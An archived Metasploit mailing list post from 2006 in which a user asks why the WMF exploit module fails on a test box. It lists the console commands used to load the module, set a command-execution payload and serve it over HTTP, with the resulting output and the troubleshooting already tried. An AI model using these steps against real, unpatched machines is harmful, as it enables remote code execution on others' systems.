Metasploit mailing list archives
unable to reproduce WMF exploit
From: exceed at email.si (/dev/null)
Date: Tue, 10 Jan 2006 13:02:20 +0100
Sorry, for off-topic... Seem that everybody was able to reproduce the WMF exploit except me :) Here are the steps I performed: - use ie_xp_pfv_metafile - set PAYLOAD win32_exec - set CMD cmd.exe - exploit msf ie_xp_pfv_metafile(win32_exec) > exploit [*] Waiting for connections to http://192.168.0.1:8080/ [*] HTTP Client connected from 192.168.0.10:1075, sending 1592 bytes of payload... The file is saved on disk, but when I open directory in Windows Explorer nothing happens. Well, few times explorer.exe crashed, but that's all. No cmd.exe execution. I don't have indexing disabled... I have tried even with the old versions of the explot, I have tried with Gzip and chunked disabled, I have tried with EXITPROC seh and thread, I used FF, IE and even wget. I don't have DEP enabled, I don't use any AV on my test box... The most amazing thing: when I try calc.bmp generated by Mr.Moore it works like a cham... Obviously I am doing something wrong. ____________________ http://www.email.si/
Current thread:
- unable to reproduce WMF exploit /dev/null (Jan 10)
- unable to reproduce WMF exploit Devin Ertel (Jan 10)
- unable to reproduce WMF exploit H D Moore (Jan 10)
- unable to reproduce WMF exploit Michael Wood (Jan 12)
- unable to reproduce WMF exploit H D Moore (Jan 12)
- <Possible follow-ups>
- unable to reproduce WMF exploit /dev/null (Jan 10)